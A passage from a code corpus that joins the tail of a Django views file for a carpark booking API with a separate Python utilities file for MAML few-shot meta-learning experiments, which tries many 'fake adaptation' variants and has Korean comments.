carpark = CarBay.objects.get(pk=request.data['pk'])
serializer = CarBaySerializer(carpark, data=request.data)
else:
serializer = CarBaySerializer(data=request.data)
if not serializer.is_valid():
if 'redirect' in request.data:
request.session["bay_errors"] = [str(error[1][0]).replace("this field", error[0])
for error in serializer.errors.items()]
return redirect(f"/admin/carparks/{request.data.get('carpark', '')}/bay/add")
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
serializer.save()
if 'redirect' in request.data:
return redirect(request.data['redirect'])
return JsonResponse(serializer.data, status=status.HTTP_201_CREATED)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'PUT', 'DELETE'])
def carbay_detail(request, pk):
try:
carbay: CarBay = CarBay.objects.get(pk=pk)
except CarBay.DoesNotExist:
return HttpResponse(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = CarBaySerializer(carbay)
return JsonResponse(serializer.data)
elif request.method == 'PUT':
carbay_data = JSONParser().parse(request)
serializer = CarBaySerializer(carbay, data=carbay_data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
carbay.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET'])
def carbays_list(request, pk):
if request.method == 'GET':
data = CarBay.objects.all().filter(carpark=pk)
serializer = CarBaySerializer(data, context={'request': request}, many=True)
return Response(serializer.data)
@login_required(login_url="/login")
@csrf_protect
@api_view(['POST'])
def bays_booked(request):
if request.method == 'POST':
"""
{
"date": "2000-01-01",
"carpark": 1
}
"""
if 'date' not in request.data and 'carpark' not in request.data:
return JsonResponse({
'error': 'Please supply what carpark and date you want.'
}, status=status.HTTP_400_BAD_REQUEST)
bays = BaysBooked.objects.filter(booking__date=request.data['date'], bay__carpark=request.data['carpark'])
baysBookedSerializer = BaysBookedSerializer(bays, context={'request': request}, many=True)
baysCleaned = []
# Do not return any information on bookings
for bay in baysBookedSerializer.data:
baysCleaned.append({
'pk': bay['pk'],
'bay': bay['bay'],
'start_time': bay['start_time'],
'end_time': bay['end_time'],
})
return JsonResponse({'success': True, 'bays': baysCleaned}, status=status.HTTP_200_OK)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def bookings(request):
if request.method == 'GET':
bookings = Bookings.objects.all()
bookingsSerializer = BookingsSerializer(bookings, context={'request': request}, many=True)
return Response(bookingsSerializer.data)
elif request.method == 'POST':
"""
{
"booking": {
"carpark": 1,
"date": "2000-01-01", # YYYY-MM-DD
"name": "uniart",
"email": "<EMAIL>",
"rego": "1234",
"company": "uni",
"phone": 1234,
"user": 1
},
"bays": [
{
"bay": 1,
"start_time": "00:00",
"end_time": "12:00"
},
{
"bay": 2,
"start_time": "00:00",
"end_time": "12:00"
}
]
}
"""
if 'booking' not in request.data:
return JsonResponse({
'error': 'Please supply booking details.'
}, status=status.HTTP_400_BAD_REQUEST)
if 'bays' not in request.data:
return JsonResponse({
'error': 'Please supply bays to be booked.'
}, status=status.HTTP_400_BAD_REQUEST)
booking = request.data['booking']
# Find carpark for booking
try:
carpark = CarPark.objects.get(pk=booking['carpark'])
except CarPark.DoesNotExist:
return JsonResponse({
'error': 'No carpark could be found given the id.'
}, status=status.HTTP_400_BAD_REQUEST)
booking['carpark_id'] = carpark.pk
# Find user for booking
try:
user = User.objects.get(pk=booking['user'])
except User.DoesNotExist:
return JsonResponse({
'error': 'No user could be found given the id.'
}, status=status.HTTP_400_BAD_REQUEST)
booking['user_id'] = user.pk
bookingsSerializer = BookingsSerializer(data=request.data['booking'])
if not bookingsSerializer.is_valid():
return JsonResponse({
'errors': bookingsSerializer.errors
}, status=status.HTTP_400_BAD_REQUEST)
bookingsSerializer.save()
# Save Bays
for bay in request.data['bays']:
try:
CarBay.objects.get(pk=bay['bay'])
except CarBay.DoesNotExist:
return JsonResponse({
'error': 'No Carpark bay could be found given the id.'
}, status=status.HTTP_400_BAD_REQUEST)
bayBooked = bay
bayBooked['booking_id'] = bookingsSerializer.data['pk']
bayBooked['bay_id'] = bay['bay']
baysBookedSerializer = BaysBookedSerializer(data=bayBooked)
if not baysBookedSerializer.is_valid():
return JsonResponse({
'errors': baysBookedSerializer.errors
}, status=status.HTTP_400_BAD_REQUEST)
baysBookedSerializer.save()
# Send email
booking = bookingsSerializer.data
if log_and_send_mail(
subject="Your UniPark Booking",
to_email=[request.data['booking']['email']],
category="EmailBooking",
template="emails/booking.html",
data={
"booking": booking,
"carpark": booking['carpark'],
"bays": BaysBooked.objects.filter(booking__id=booking['pk']),
"user": booking['user'],
},
):
return JsonResponse({'success': True, 'booking_id': bookingsSerializer.data['pk']},
status=status.HTTP_201_CREATED)
else:
return JsonResponse({
'error': 'Something went wrong when sending email.'
}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'DELETE'])
def booking(request, pk):
if request.method == 'GET':
try:
booking = Bookings.objects.get(pk=pk)
except Bookings.DoesNotExist:
return JsonResponse({'error': 'Booking cannot be found.'}, status=status.HTTP_400_BAD_REQUEST)
bookingsSerializer = BookingsSerializer(booking, context={'request': request})
try:
bays = BaysBooked.objects.filter(booking__id=pk)
except Bookings.DoesNotExist:
return JsonResponse({'error': 'No bays can be found for this booking.'}, status=status.HTTP_400_BAD_REQUEST)
baysBookedSerializer = BaysBookedSerializer(bays, context={'request': request}, many=True)
baysCleaned = []
for bay in baysBookedSerializer.data:
baysCleaned.append({
'pk': bay['pk'],
'bay': bay['bay'],
'start_time': bay['start_time'],
'end_time': bay['end_time'],
})
return JsonResponse({'booking': bookingsSerializer.data, 'bays': baysCleaned}, status=status.HTTP_200_OK)
if request.method == 'DELETE':
booking = Bookings.objects.get(pk=pk)
booking.delete()
bays = BaysBooked.objects.filter(booking__id=pk)
for bay in bays:
bay.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
| 2.09375 | 2 |
utils.py | eepLearning/learn2learn | 0 | 17698 | <filename>utils.py
import numpy as np
import torch
from torch.autograd import grad
from learn2learn.utils import clone_module, update_module
from torch import nn, optim
def maml_update(model, lr, grads=None):
"""
[[Source]](https://github.com/learnables/learn2learn/blob/master/learn2learn/algorithms/maml.py)
**Description**
Performs a MAML update on model using grads and lr.
The function re-routes the Python object, thus avoiding in-place
operations.
NOTE: The model itself is updated in-place (no deepcopy), but the
parameters' tensors are not.
**Arguments**
* **model** (Module) - The model to update.
* **lr** (float) - The learning rate used to update the model.
* **grads** (list, *optional*, default=None) - A list of gradients for each parameter
of the model. If None, will use the gradients in .grad attributes.
**Example**
~~~python
maml = l2l.algorithms.MAML(Model(), lr=0.1)
model = maml.clone() # The next two lines essentially implement model.adapt(loss)
grads = autograd.grad(loss, model.parameters(), create_graph=True)
maml_update(model, lr=0.1, grads)
~~~
"""
if grads is not None:
params = list(model.parameters())
if not len(grads) == len(list(params)):
msg = 'WARNING:maml_update(): Parameters and gradients have different length. ('
msg += str(len(params)) + ' vs ' + str(len(grads)) + ')'
print(msg)
for p, g in zip(params, grads):
if g is not None:
p.update = - lr * g
return update_module(model)
def accuracy(predictions, targets):
predictions = predictions.argmax(dim=1).view(targets.shape)
return (predictions == targets).sum().float() / targets.size(0)
def fast_adapt(batch, learner, loss, adaptation_steps, shots, ways, device):
data, labels = batch
data, labels = data.to(device), labels.to(device)
# Separate data into adaptation/evalutation sets
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error) # update
# Evaluate the adapted model
predictions = learner(evaluation_data)
# query loss
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy
# Adapt the model #support loss
def fake_adopt_debug2(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task):
data, labels = batch
data, labels = data.to(device), labels.to(device)
# Separate data into adaptation/evalutation sets
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
loss2 = nn.CrossEntropyLoss(reduction='none')
# Adapt the model #support loss
for step in range(adaptation_steps):
train_error = loss2(learner(adaptation_data), adaptation_labels)
# learner.adapt(train_error) #update
mean_seperate_error = torch.mean(train_error)
grads = grad(mean_seperate_error, learner.parameters(), create_graph=True)
updates = [-learner.lr * g for g in grads]
update_module(learner, updates=updates)
# Evaluate the adapted model
predictions = learner(evaluation_data)
# query loss
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy,{"2":[3]},{"2":[3]}
def fake_adopt_before(batch, learner, loss, adaptation_steps, shots, ways, device, error_dict, error_data, task):
datas, labels = batch
datas, labels = datas.to(device), labels.to(device)
# Separate data into adaptation/evalutation sets
adaptation_indices = np.zeros(datas.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
# Adapt the model
train_error = 0
print("adaptation_labels)", adaptation_labels)
for step in range(adaptation_steps):
for (one_class_data, one_class_label) in zip(adaptation_data, adaptation_labels):
print("one_class_label: ", one_class_label)
one_class_data = one_class_data.unsqueeze(0)
one_class_label = one_class_label.unsqueeze(0)
print("one_class_label:(unsquzee) ", one_class_label)
one_class_loss = loss(learner(one_class_data), one_class_label)
grads = grad(one_class_loss / 5, learner.parameters(), allow_unused=False)
error_dict[task].append(grads)
train_error += one_class_loss
# print("one class label loss :",one_class_loss)
# print("mean train error :",train_error/5)
original_error = loss(learner(adaptation_data), adaptation_labels)
# print("original train error : ",original_error)
# print("@@@@@@@@@@@@@@@@@@@debug loss")
# fine-tune
# learner.adapt(train_error)
for g in error_dict[task]:
learner = maml_update(learner, learner.lr, g)
# Evaluate the adapted model
error_data[task] = evaluation_data, evaluation_labels
predictions = learner(evaluation_data)
# query loss
evaluation_error = loss(predictions, evaluation_labels)
evaluation_accuracy = accuracy(predictions, evaluation_labels)
return evaluation_error, evaluation_accuracy, error_dict, error_data
def fake_adopt_now(learner, fake_grads, loss, error_data, task):
for g in fake_grads:
learner = maml_update(learner, learner.lr, g)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
def fake_adopt_debug(batch, learner, loss, adaptation_steps, shots, ways, device, error_dict, error_data, task):
datas, labels = batch
datas, labels = datas.to(device), labels.to(device)
# Separate data into adaptation/evalutation sets
adaptation_indices = np.zeros(datas.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
# Adapt the model
train_error = []
# print("adaptation_labels)", adaptation_labels)
for step in range(adaptation_steps):
for (one_class_data, one_class_label) in zip(adaptation_data, adaptation_labels):
# print("one_class_label: ", one_class_label)
# print("one_class_label:(unsquzee) ", one_class_label)
# 주석처리
one_class_data = one_class_data.unsqueeze(0)
one_class_label = one_class_label.unsqueeze(0)
one_class_loss = loss(learner(one_class_data), one_class_label)
grads = grad(one_class_loss / 5, learner.parameters(), create_graph=True)
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error.append(one_class_loss)
# print("one class label loss :",one_class_loss)
# print("mean train error :",train_error/5)
# original_error = loss(learner(adaptation_data), adaptation_labels)
# print("original train error : ",original_error)
# print("@@@@@@@@@@@@@@@@@@@debug loss")
# fine-tune
# learner.adapt(train_error)
# 1차 시도
# for g in error_dict[task]:
# learner = maml_update(learner, learner.lr, g)
# 2차 시도
# for u in error_dict[task]:
# update_module(learner,updates = u)
# 3차 시도
# grads = grad(train_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# 4차 시도
# grads = grad(original_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# 5차 시도
# mean_error = torch.mean(torch.stack(train_error))
# grads = grad(mean_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# 6차 시도
# mean_error = torch.mean(torch.stack(train_error))
# grads = grad(mean_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# Evaluate the adapted model
error_data[task] = evaluation_data, evaluation_labels
predictions = learner(evaluation_data)
# query loss
evaluation_error = loss(predictions, evaluation_labels)
evaluation_accuracy = accuracy(predictions, evaluation_labels)
return evaluation_error, evaluation_accuracy, error_dict, error_data
def evaluate(test_iteration, maml, task_information):
tasksets, meta_batch_size, loss, adaptation_steps, shots, ways, device = task_information
test_error = []
test_accuracy = []
for i in range(test_iteration):
meta_test_error = 0.0
meta_test_accuracy = 0.0
# Compute meta-testing loss
learner = maml.clone()
batch = tasksets.test.sample()
# print("batch",len(batch))
evaluation_error, evaluation_accuracy = fast_adapt(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device)
meta_test_error += evaluation_error.item()
meta_test_accuracy += evaluation_accuracy.item()
test_error.append(meta_test_error)
test_accuracy.append(meta_test_accuracy)
# print('Meta Test Error', meta_test_error / meta_batch_size)
# print('Meta Test Accuracy', meta_test_accuracy / meta_batch_size)
test_error_mean = np.mean(test_error)
test_accuracy_mean = np.mean(test_accuracy)
test_error_std = np.std(test_error)
test_accuracy_std = np.std(test_accuracy)
print('Meta Test Error(Iteration Record)', test_error_mean)
print('Meta Test Accuracy(Iteration Record)', test_accuracy_mean)
return test_error_mean, test_error_std, test_accuracy_mean, test_accuracy_std
####new fake adopt 1
def fake_adopt_1_before(batch,
learner,
loss,
adaptation_steps,
shots, ways, device,
error_dict, error_data,
task):
datas, labels = batch
datas, labels = datas.to(device), labels.to(device)
# Separate data into adaptation/evalutation sets
adaptation_indices = np.zeros(datas.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
# Adapt the model
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
error_data[task] = evaluation_data, evaluation_labels
# Evaluate the adapted model
predictions = learner(evaluation_data)
# query loss
evaluation_error = loss(predictions, evaluation_labels)
evaluation_accuracy = accuracy(predictions, evaluation_labels)
return evaluation_error, evaluation_accuracy, error_dict, error_data
def fake_adopt_1_now(learner, fake_grads, loss, error_data, task):
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#####fake_adopt 3
def fake_adopt_3_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if iteration % 49 == 0:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_3_now(learner, fake_grads, loss, error_data, task):
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 4
def fake_adopt_4_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if iteration % 9 == 0:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
#grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
#updates = [-learner.lr * g for g in grads]
error_dict[task].append(il)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_4_now(learner, fake_grads, loss, error_data, task):
#for in fake_grads:
#update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 5
def fake_adopt_5_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration,split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_5_now(learner, fake_grads, loss, error_data, task):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 6
def fake_adopt_6_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration,split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_6_now(learner, fake_grads, loss, error_data, task):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 7 (랩미팅 피드백)
# 50% 정상 + 50% fake
# 50 % 전반 client 정상적 진행
# 50 % 후반 client 가지고 fake 진행행
def fake_adopt_7_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
#후반 50% client fake 진행
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
#정상적인 진행 :전반 50% client
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_7_now(learner, fake_grads, loss, error_data, task,label_index,client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates) #일단 fake adaptation
loss2 = nn.CrossEntropyLoss(reduction='none')
#Client로 접근
error_list = []
for idx,client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data),query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
#fake7 : 1차 시도
#그냥 지금까지 실패했던 것처럼 로직만 짜고 러프하게 loss 일일이 구해서 그것들을 평균내는 방식으로
#산출 , 실패 예상 => 사실 이게 되면 제일 깔끔
#엥 돌아가버리네 이게??
#############fake adopt 8 (랩미팅 피드백)
# 50% 정상 + 50% fake
# 50 % 전반 client 정상적 진행
# 50 % 전반 client 가지고 fake 진행행
def fake_adopt_8_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
#초반 50% client를 가지고 grads 저장 + 정상적인 진행
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_8_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates) # 일단 fake adaptation
loss2 = nn.CrossEntropyLoss(reduction='none')
# Client로 접근
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
##0812에 구현
#############fake adopt 9 (공동 랩미팅 피드백)
# 50% 정상 + 50% fake
# 50 % 전반 client 정상적 진행
# 50 % 후반 client 가지고 fake 진행행
# + 인덱싱 (support grad / query loss)
# + class 비복원추출
def fake_adopt_9_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
# 후반 50% client fake 진행
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
# 정상적인 진행 :전반 50% client
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_9_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates) # 일단 fake adaptation
loss2 = nn.CrossEntropyLoss(reduction='none')
# Client로 접근
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
# fake7 : 1차 시도
# 그냥 지금까지 실패했던 것처럼 로직만 짜고 러프하게 loss 일일이 구해서 그것들을 평균내는 방식으로
# 산출 , 실패 예상 => 사실 이게 되면 제일 깔끔
# 엥 돌아가버리네 이게??
